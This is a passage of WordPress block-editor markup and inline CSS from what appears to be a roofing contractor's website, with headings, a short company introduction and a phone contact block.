{\"block_id\":\"2e718769-fcd4-4785-9412-0cd3058119e1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2e718769-fcd4-4785-9412-0cd3058119e1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"6549beaf-ccab-45d8-a2d8-1762500e8593\"} -->\n<style type=\"text/css\"> .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6549beaf-ccab-45d8-a2d8-1762500e8593\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"46b2c521-30e6-4f12-bba8-c52b80616d9c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-46b2c521-30e6-4f12-bba8-c52b80616d9c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing have led us to become a top choice when it comes to roofing and siding in southeastern Michigan. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"baab3fad-1feb-480f-b0a0-542d07c7eba5\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-baab3fad-1feb-480f-b0a0-542d07c7eba5 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"e4337017-bf4d-4e71-bbfe-842d1c251e6c\"} -->\n<style type=\"text/css\"> .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e4337017-bf4d-4e71-bbfe-842d1c251e6c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"7840f5f3-0744-458f-9ff2-16549137981d\"} -->\n<style type=\"text/css\"> .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7840f5f3-0744-458f-9ff2-16549137981d\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"65659e02-d7c8-4601-8298-92cc76359ea6\"} -->\n<style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000 </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"0521c096-f2f6-411e-ad36-b722f208852d\"} -->\n<style type=\"text/css\"> .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0521c096-f2f6-411e-ad36-b722f208852d\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"b774f8a6-033a-4077-80ee-f0b2f30b0428\"} -->\n<style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 